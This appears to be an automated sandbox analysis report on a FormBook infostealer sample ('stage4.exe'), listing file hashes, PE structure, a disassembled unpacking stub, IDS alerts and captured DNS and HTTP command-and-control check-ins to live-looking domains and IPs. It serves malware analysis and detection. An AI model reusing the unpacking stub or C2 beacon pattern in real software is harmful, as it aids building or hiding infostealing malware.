	PO_210205.exe	Get hash	malicious	Browse	109.234.162.61
	Calendario dei pagamenti.exe	Get hash	malicious	Browse	109.234.165.73
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	109.234.162.39
	http://lecomptoirdusushi.com/commandes/menu-sushi-saumon/	Get hash	malicious	Browse	109.234.161.178

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.235562002304995
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	stage4.exe
File size:	168121
MD5:	17032a31243253b4fefeb5c6a9604c1f
SHA1:	c6b4a5a935594c61293d8d26c2b891f4c4c02bec
SHA256:	84eca147b83cc4116ebb6c34dbe60f7231c676f17152cb376d8efb913d534723
SHA512:	8b216770e0ff9d1e159f40f9b73cfe9c42bd69e45f7a15a061d26409775726eb1a1a3162d3efa7337e4dc2b1a37cecb7524ec94c1480ec47585104d808174199
SSDEEP:	3072:n82u5Y0tuW/yg8UQulhP2kNCFdpU63jl58+4skdLvLu6bV6h5R4:n8LY6uWqdUQu/PpCFRI+VkVTbk
File Content Preview:	MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......}f?.9.QH9.QH9.QH"..Hu.QH"..H:.QH"..H8.QHRich9.QH........PE..L....jMK.................\|........................@................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x429000
Entrypoint Section:	.Stone
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x4B4D6A93 [Wed Jan 13 06:39:15 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:

Entrypoint Preview

Instruction
push ebp
push edi
push esi
push edx
push ecx
push ebx
call 00007F9BCCD89C15h
pop ebp
mov edx, ebp
sub ebp, 00403B97h
sub edx, dword ptr [ebp+00403C2Dh]
sub edx, 0Bh
mov dword ptr [ebp+00403C36h], edx
add dword ptr [ebp+00403C24h], edx
add dword ptr [ebp+00403C28h], edx
cmp byte ptr [ebp+00403C2Ch], 00000000h
jne 00007F9BCCD89C5Ch
mov byte ptr [ebp+00403C2Ch], 00000001h
lea esi, dword ptr [ebp+00403C35h]
movzx esi, byte ptr [esi]
mov edi, ebp
lea ebx, dword ptr [ebp+00403C36h]
mov ebx, dword ptr [ebx]
lea eax, dword ptr [edi+00403C3Ah]
mov eax, dword ptr [eax]
add ebx, eax
lea ecx, dword ptr [edi+00403C3Eh]
mov ecx, dword ptr [ecx]
cmp ebx, dword ptr [ebp+00403C28h]
jnle 00007F9BCCD89C1Ch
cmp ebx, dword ptr [ebp+00403C24h]
jl 00007F9BCCD89C14h
jmp 00007F9BCCD89C15h
sub byte ptr [ebx], 00000001h
inc ebx
loop 00007F9BCCD89BFAh
add edi, 08h
dec esi
jne 00007F9BCCD89BDAh
mov eax, dword ptr [ebp+00403C31h]
mov ebx, dword ptr [ebp+00403C36h]
add eax, ebx
pop ebx
pop ecx
pop edx
pop esi
pop edi
pop ebp
jmp eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
nop
add al, byte ptr [eax]
push eax
aam 01h
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [edx+eax+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[LNK] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29140	0x14	.Stone
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27b6c	0x27c00	False	0.750061419025	data	7.32674754274	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.Stone	0x29000	0x1000	0x11b	False	0.752650176678	data	5.19912039422	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/22/21-14:42:26.369951	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.5	34.102.136.180
11/22/21-14:42:26.369951	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.5	34.102.136.180
11/22/21-14:42:26.369951	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.5	34.102.136.180
11/22/21-14:42:26.547837	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49830	34.102.136.180	192.168.2.5
11/22/21-14:42:37.241290	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
11/22/21-14:42:38.289492	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
11/22/21-14:42:40.169739	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
11/22/21-14:42:41.621848	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.5	109.234.160.63
11/22/21-14:42:41.621848	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.5	109.234.160.63
11/22/21-14:42:41.621848	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.5	109.234.160.63
11/22/21-14:43:02.399152	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.2.5	168.119.175.0
11/22/21-14:43:02.399152	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.2.5	168.119.175.0
11/22/21-14:43:02.399152	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.2.5	168.119.175.0
11/22/21-14:43:07.921281	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49841	34.102.136.180	192.168.2.5
11/22/21-14:43:18.737461	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.5	192.200.108.3
11/22/21-14:43:18.737461	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.5	192.200.108.3
11/22/21-14:43:18.737461	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49843	80	192.168.2.5	192.200.108.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:42:16.204493999 CET	49795	80	192.168.2.5	88.99.22.5
Nov 22, 2021 14:42:16.228193045 CET	80	49795	88.99.22.5	192.168.2.5
Nov 22, 2021 14:42:16.228395939 CET	49795	80	192.168.2.5	88.99.22.5
Nov 22, 2021 14:42:16.228518963 CET	49795	80	192.168.2.5	88.99.22.5
Nov 22, 2021 14:42:16.251844883 CET	80	49795	88.99.22.5	192.168.2.5
Nov 22, 2021 14:42:16.251874924 CET	80	49795	88.99.22.5	192.168.2.5
Nov 22, 2021 14:42:16.251889944 CET	80	49795	88.99.22.5	192.168.2.5
Nov 22, 2021 14:42:16.252068043 CET	49795	80	192.168.2.5	88.99.22.5
Nov 22, 2021 14:42:16.252114058 CET	49795	80	192.168.2.5	88.99.22.5
Nov 22, 2021 14:42:16.275718927 CET	80	49795	88.99.22.5	192.168.2.5
Nov 22, 2021 14:42:26.349642992 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.369054079 CET	80	49830	34.102.136.180	192.168.2.5
Nov 22, 2021 14:42:26.369323969 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.369951010 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.389170885 CET	80	49830	34.102.136.180	192.168.2.5
Nov 22, 2021 14:42:26.547837019 CET	80	49830	34.102.136.180	192.168.2.5
Nov 22, 2021 14:42:26.547888994 CET	80	49830	34.102.136.180	192.168.2.5
Nov 22, 2021 14:42:26.548062086 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.548139095 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.856930017 CET	49830	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:42:26.876194000 CET	80	49830	34.102.136.180	192.168.2.5
Nov 22, 2021 14:42:41.586298943 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:42:41.621258974 CET	80	49833	109.234.160.63	192.168.2.5
Nov 22, 2021 14:42:41.621568918 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:42:41.621848106 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:42:41.656173944 CET	80	49833	109.234.160.63	192.168.2.5
Nov 22, 2021 14:42:42.123996019 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:42:42.197710037 CET	80	49833	109.234.160.63	192.168.2.5
Nov 22, 2021 14:42:44.376029968 CET	80	49833	109.234.160.63	192.168.2.5
Nov 22, 2021 14:42:44.376058102 CET	80	49833	109.234.160.63	192.168.2.5
Nov 22, 2021 14:42:44.376147985 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:42:44.376362085 CET	49833	80	192.168.2.5	109.234.160.63
Nov 22, 2021 14:43:07.785331964 CET	49841	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:43:07.804630995 CET	80	49841	34.102.136.180	192.168.2.5
Nov 22, 2021 14:43:07.804933071 CET	49841	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:43:07.805015087 CET	49841	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:43:07.824227095 CET	80	49841	34.102.136.180	192.168.2.5
Nov 22, 2021 14:43:07.921281099 CET	80	49841	34.102.136.180	192.168.2.5
Nov 22, 2021 14:43:07.921314955 CET	80	49841	34.102.136.180	192.168.2.5
Nov 22, 2021 14:43:07.921552896 CET	49841	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:43:07.924789906 CET	49841	80	192.168.2.5	34.102.136.180
Nov 22, 2021 14:43:07.944025993 CET	80	49841	34.102.136.180	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:42:16.178601027 CET	55016	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:16.198832035 CET	53	55016	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:26.284693003 CET	54450	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:26.320882082 CET	53	54450	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:31.598650932 CET	59261	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:32.607846975 CET	59261	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:33.607894897 CET	59261	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:35.624649048 CET	59261	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:36.517693996 CET	53	59261	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:37.241158962 CET	53	59261	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:38.287899971 CET	53	59261	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:40.169660091 CET	53	59261	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:41.534477949 CET	57151	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:41.576281071 CET	53	57151	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:47.141532898 CET	59413	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:47.180607080 CET	53	59413	8.8.8.8	192.168.2.5
Nov 22, 2021 14:42:57.205194950 CET	51649	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:42:57.236500025 CET	53	51649	8.8.8.8	192.168.2.5
Nov 22, 2021 14:43:02.339025974 CET	65086	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:43:02.375636101 CET	53	65086	8.8.8.8	192.168.2.5
Nov 22, 2021 14:43:07.758305073 CET	52929	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:43:07.782603025 CET	53	52929	8.8.8.8	192.168.2.5
Nov 22, 2021 14:43:12.934286118 CET	64317	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:43:12.958105087 CET	53	64317	8.8.8.8	192.168.2.5
Nov 22, 2021 14:43:18.403944016 CET	61004	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:43:18.580516100 CET	53	61004	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 22, 2021 14:42:37.241290092 CET	192.168.2.5	8.8.8.8	cff8	(Port unreachable)	Destination Unreachable
Nov 22, 2021 14:42:38.289491892 CET	192.168.2.5	8.8.8.8	cff8	(Port unreachable)	Destination Unreachable
Nov 22, 2021 14:42:40.169739008 CET	192.168.2.5	8.8.8.8	cff8	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 22, 2021 14:42:16.178601027 CET	192.168.2.5	8.8.8.8	0xb195	Standard query (0)	www.feetlover.online	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:26.284693003 CET	192.168.2.5	8.8.8.8	0xe68d	Standard query (0)	www.dartsearchengine.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:31.598650932 CET	192.168.2.5	8.8.8.8	0x1f56	Standard query (0)	www.theeppunday.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:32.607846975 CET	192.168.2.5	8.8.8.8	0x1f56	Standard query (0)	www.theeppunday.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:33.607894897 CET	192.168.2.5	8.8.8.8	0x1f56	Standard query (0)	www.theeppunday.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:35.624649048 CET	192.168.2.5	8.8.8.8	0x1f56	Standard query (0)	www.theeppunday.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:41.534477949 CET	192.168.2.5	8.8.8.8	0xb0cf	Standard query (0)	www.egregore.club	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:47.141532898 CET	192.168.2.5	8.8.8.8	0x15d9	Standard query (0)	www.security-paiemet.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:57.205194950 CET	192.168.2.5	8.8.8.8	0x564f	Standard query (0)	www.zenholisticstores.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:02.339025974 CET	192.168.2.5	8.8.8.8	0xca35	Standard query (0)	www.ragworkhouse.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:07.758305073 CET	192.168.2.5	8.8.8.8	0x501b	Standard query (0)	www.gconsultingfirm.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:12.934286118 CET	192.168.2.5	8.8.8.8	0x19a9	Standard query (0)	www.mgav26.xyz	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:18.403944016 CET	192.168.2.5	8.8.8.8	0xe1ed	Standard query (0)	www.phillystore.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 22, 2021 14:42:16.198832035 CET	8.8.8.8	192.168.2.5	0xb195	No error (0)	www.feetlover.online		88.99.22.5	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:26.320882082 CET	8.8.8.8	192.168.2.5	0xe68d	No error (0)	www.dartsearchengine.com	dartsearchengine.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:26.320882082 CET	8.8.8.8	192.168.2.5	0xe68d	No error (0)	dartsearchengine.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:36.517693996 CET	8.8.8.8	192.168.2.5	0x1f56	Server failure (2)	www.theeppunday.com	none	none	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:37.241158962 CET	8.8.8.8	192.168.2.5	0x1f56	Server failure (2)	www.theeppunday.com	none	none	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:38.287899971 CET	8.8.8.8	192.168.2.5	0x1f56	Server failure (2)	www.theeppunday.com	none	none	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:40.169660091 CET	8.8.8.8	192.168.2.5	0x1f56	Server failure (2)	www.theeppunday.com	none	none	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:41.576281071 CET	8.8.8.8	192.168.2.5	0xb0cf	No error (0)	www.egregore.club	egregore.club		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:41.576281071 CET	8.8.8.8	192.168.2.5	0xb0cf	No error (0)	egregore.club		109.234.160.63	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:47.180607080 CET	8.8.8.8	192.168.2.5	0x15d9	Name error (3)	www.security-paiemet.com	none	none	A (IP address)	IN (0x0001)
Nov 22, 2021 14:42:57.236500025 CET	8.8.8.8	192.168.2.5	0x564f	No error (0)	www.zenholisticstores.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:57.236500025 CET	8.8.8.8	192.168.2.5	0x564f	No error (0)	gcdn0.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:57.236500025 CET	8.8.8.8	192.168.2.5	0x564f	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:57.236500025 CET	8.8.8.8	192.168.2.5	0x564f	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-db4-63-96.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:42:57.236500025 CET	8.8.8.8	192.168.2.5	0x564f	No error (0)	td-balancer-db4-63-96.wixdns.net		185.230.63.96	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:02.375636101 CET	8.8.8.8	192.168.2.5	0xca35	No error (0)	www.ragworkhouse.com	ragworkhouse.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:43:02.375636101 CET	8.8.8.8	192.168.2.5	0xca35	No error (0)	ragworkhouse.com		168.119.175.0	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:07.782603025 CET	8.8.8.8	192.168.2.5	0x501b	No error (0)	www.gconsultingfirm.com	gconsultingfirm.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:43:07.782603025 CET	8.8.8.8	192.168.2.5	0x501b	No error (0)	gconsultingfirm.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:12.958105087 CET	8.8.8.8	192.168.2.5	0x19a9	No error (0)	www.mgav26.xyz		45.128.51.66	A (IP address)	IN (0x0001)
Nov 22, 2021 14:43:18.580516100 CET	8.8.8.8	192.168.2.5	0xe1ed	No error (0)	www.phillystore.net		192.200.108.3	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.feetlover.online

www.dartsearchengine.com

www.egregore.club

www.gconsultingfirm.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49795	88.99.22.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 14:42:16.228518963 CET	7512	OUT	GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1 Host: www.feetlover.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2021 14:42:16.251874924 CET	7512	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Mon, 22 Nov 2021 13:42:16 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: https://www.feetlover.online:443/n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49830	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 14:42:26.369951010 CET	8305	OUT	GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1 Host: www.dartsearchengine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2021 14:42:26.547837019 CET	8306	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 22 Nov 2021 13:42:26 GMT Content-Type: text/html Content-Length: 275 ETag: "6193c8c9-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49833	109.234.160.63	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 14:42:41.621848106 CET	8312	OUT	GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1 Host: www.egregore.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2021 14:42:44.376029968 CET	8313	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 22 Nov 2021 13:42:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP Server: o2switch-PowerBoost-v3

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49841	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 14:43:07.805015087 CET	8339	OUT	GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1 Host: www.gconsultingfirm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2021 14:43:07.921281099 CET	8340	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 22 Nov 2021 13:43:07 GMT Content-Type: text/html Content-Length: 275 ETag: "618be761-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: stage4.exe PID: 6388 Parent PID: 764

General

Start time:	14:40:37
Start date:	22/11/2021
Path:	C:\Users\user\Desktop\stage4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\stage4.exe"
Imagebase:	0x1200000
File size:	168121 bytes
MD5 hash:	17032A31243253B4FEFEB5C6A9604C1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
